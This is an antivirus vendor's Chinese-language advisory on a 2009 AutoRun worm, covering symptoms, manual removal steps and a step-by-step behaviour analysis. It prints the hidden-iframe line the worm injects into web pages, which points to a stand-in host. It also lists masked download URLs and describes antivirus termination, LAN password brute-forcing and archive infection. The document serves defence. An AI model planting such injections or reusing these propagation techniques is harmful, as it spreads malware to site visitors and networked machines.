"中华吸血鬼"新变种

Worm.Win32.AutoRun.i

捕获时间

2009-10-15

危害等级

高

病毒症状

　该样本是使用“VC”编写的蠕虫病毒，由微点主动防御软件自动捕获，采用“FSG”加壳方式，企图躲避特征码扫描，加壳后长度为“16,897 字节 ”，图标为“
”，病毒扩展名为“exe”，主要通过“文件捆绑”、“下载器下载”、“移动存储介质”、“网页挂马”等方式传播，病毒主要目的为下载大量病毒并运行。
　　用户中毒后，会出现大多数杀毒软件退出和无法正常运行、系统运行缓慢、网络速度变缓、无法进入安全模式、金山毒霸无法在线升级、打开网页始终访问同一个网址、许多反病毒论坛网页无法打开、出现大量未知进程等现象。

感染对象

Windows 2000/Windows XP/Windows 2003/Vista

传播途径

网页木马、文件捆绑、下载器下载

防范措施

已安装使用微点主动防御软件的用户，无须任何设置，微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本，微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版，微点主动防御软件在发现该病毒后将报警提示您发现“未知木马”，请直接选择删除处理（如图1）；

图1 微点主动防御软件自动捕获未知病毒（未升级）

如果您已经将微点主动防御软件升级到最新版本，微点将报警提示您发现"Worm.Win32.AutoRun.i”，请直接选择删除（如图2）。

  图2   微点主动防御软件升级后截获已知病毒

未安装微点主动防御软件的手动解决办法：

1、手动恢复以下文件：

全盘删除所有压缩包中名为”安装.bat”的病毒文件。
全盘删除所有网页文件中的以下代码:
<iframe src=http://www.xx.cn/1.htm width=0 height=0></iframe>
全盘删除所有文件夹下名为wsock32.dll的文件
拷贝相同版本文件到: %SystemRoot%\system32\drivers\etc\hosts

2、手动删除以下文件：
　　
%SystemRoot%\ini
%SystemRoot%\ini\ini.exe
%SystemRoot%\ini\shit.vbs
%SystemRoot%\Tasks\安装.bat
%TEMP%\configmon.dat
%SystemRoot%\ini\wsock32.dll
%SystemRoot%\ini\desktop.ini
%SystemDriver%\__default.pif
X:\AutoRun.inf
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe  (X为系统各个盘符)

3、手动删除以下注册表键值：

键: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components
值: {H8I22RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}

4、手动修复以下注册表键值:

修复安全模式:
键: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal

修复脚本显示:
键:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings
值: ActiveDebugging    数据:1
值: DisplayLogo        数据:1
值: SilentTerminate    数据:0
值:UseWINSAFER         数据:1

变量声明：

　%SystemDriver%　　　　　　　系统所在分区，通常为“C:\”
　%SystemRoot%　　　　　　　　WINDODWS所在目录，通常为“C:\Windows”
　%Documents and Settings%　　用户文档目录，通常为“C:\Documents and Settings”
　%Temp%　　　　　　　　　　　临时文件夹，通常为“C:\Documents and Settings\当前用户名称\Local Settings\Temp”
　%ProgramFiles%　　　　　　　系统程序默认安装目录，通常为：“C:\ProgramFiles”

病毒分析

（1）创建目录%SystemRoot%\ini,并设置目录属性为隐藏, 释放文件%SystemRoot%\ini\ini.exe,并执行。
（2）创建互斥体，防止重复运行。
（3）获得当前进程列表，检测大多数反病毒软件进程，一旦找到，终止目标进程，并监视窗口文本，发现相匹配的关键字便发送一个
窗口退出消息将目标窗口退出。
（4） 在每个盘符下生成文件AutoRun.inf,并创建目录 recycle.{645FF040-5081-101B-9F08-00AA002F954E},将
%SystemRoot%\ini\ini.exe复制到recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe,并设置为隐藏，使用户每次双击
磁盘和打开资源管理器时自动运行病毒
（5）删除注册表相关键值，使病毒可以悄无声息的执行脚本程序。并创建病毒自己的注册表项，使其成为Windows的活动组件，当用户
安装组件时，会自动执行病毒的脚本程序。接着释放脚本文件%SystemRoot%\ini\shit.vbs,运行该脚本后，将执行病毒程序%SystemRoot%\ini\ini.exe。
（6）全盘查找后缀名为"html、htm、asp、aspx、php、jsp"格式的网页文件，如果找到，往目标文件中插入类似<iframe  src=http://www.xx.cn/1.htm width=0 height=0></iframe>的恶意代码，并搜索后缀名为"gho、GHO、Gho"的文件，一旦找到，将其删除。使用户丢失系统备份数据。
（7）扫描局域网内其它主机IP地址，并尝试通过匹配弱口令的方式穷举出用户管理员密码。如果穷举成功，则将
%SystemRoot%\ini\ini.exe重命名为kav32.exe复制到目标主机的每个共享目录下，并设置成在某一时间执行该病毒。
（8）病毒通过加载系统核心文件NTDLL.DLL，获得相关API函数虚拟地址，操作PhysicalMemory内核对象，并提升权限，从而实现对物理内存的直接读写操作。
（9）病毒将%SystemRoot%\ini\ini.exe重命名后复制到%SystemRoot%\Tasks\安装.bat,并全盘查找后缀名为"rar、zip、tgz、tar"的压缩包文件，一旦找到，利用%ProgramFiles%\WinRAR\Rar.exe程序将目标压缩包解压，将病毒程序"安装.bat"复制到解压出来的文件夹中，然后再压缩回去，完成将病毒添加到压缩包的功能
（10）访问目标网址，下载资源文件到%TEMP%\configmon.dat文件中，并访问资源网址，下载大量病毒到本地运行。并统计被感染主机相关信息，发送到指定网址。
（11）释放动态链接库%SystemRoot%\ini\wsock32.dll,并遍历所有磁盘文件夹，将文件%SystemRoot%\ini\wsock32.dll复制到每一个找到的文件夹下，并设置该文件属性为隐藏。
（12）释放文件%SystemDriver%\__default.pif，访问网络下载病毒更新程序，并执行，达到更新病毒自身的目的，
并删除文件%Documents and Settings%\All Users\Application Data\Kingsoft\KIS\Log.DAT和%Documents and Settings%\All Users\Application Data\Kingsoft\KIS\User.DAT使金山毒霸无法在线升级，并修改%SystemRoot%\System32\drivers\etc\hosts文件。
（13）删除注册表自启动项下的所有键值，并通过删除注册表对应键值破坏安全模式。
(14) 创建文件%SystemRoot%\ini\desktop.ini,写入desktop.ini，将其伪装成回收站，并设置为隐藏，用来隐藏自身。
（15）删除自身，退出进程。
　　
病毒创建文件：

%SystemRoot%\ini
%SystemRoot%\ini\ini.exe
%SystemRoot%\ini\shit.vbs
%SystemRoot%\Tasks\安装.bat
%TEMP%\configmon.dat
%SystemRoot%\ini\wsock32.dll
%SystemRoot%\ini\desktop.ini
%SystemDriver%\__default.pif
X:\AutoRun.inf
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe  (X为系统各个盘符)

病毒修改文件：

%SystemRoot%\system32\drivers\etc\hosts

病毒删除文件：

%Documents and Settings%\All Users\Application Data\Kingsoft\KIS\Log.DAT
%Documents and Settings%\All Users\Application Data\Kingsoft\KIS\User.DAT
X:\*.GHO (X为系统各盘符，*.GHO表示所有的GHO文件)

病毒创建注册表：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{H8I22RB03-AB-B70-7-11d2-     9CBD-0O00FS7AH6-9E2121BHJLK}
   
病毒删除注册表：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\[所有程序]
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal

病毒访问网络：

http://****/get.asp
http://****/me.exe
http://pc.sk**ne.cn/gr.txt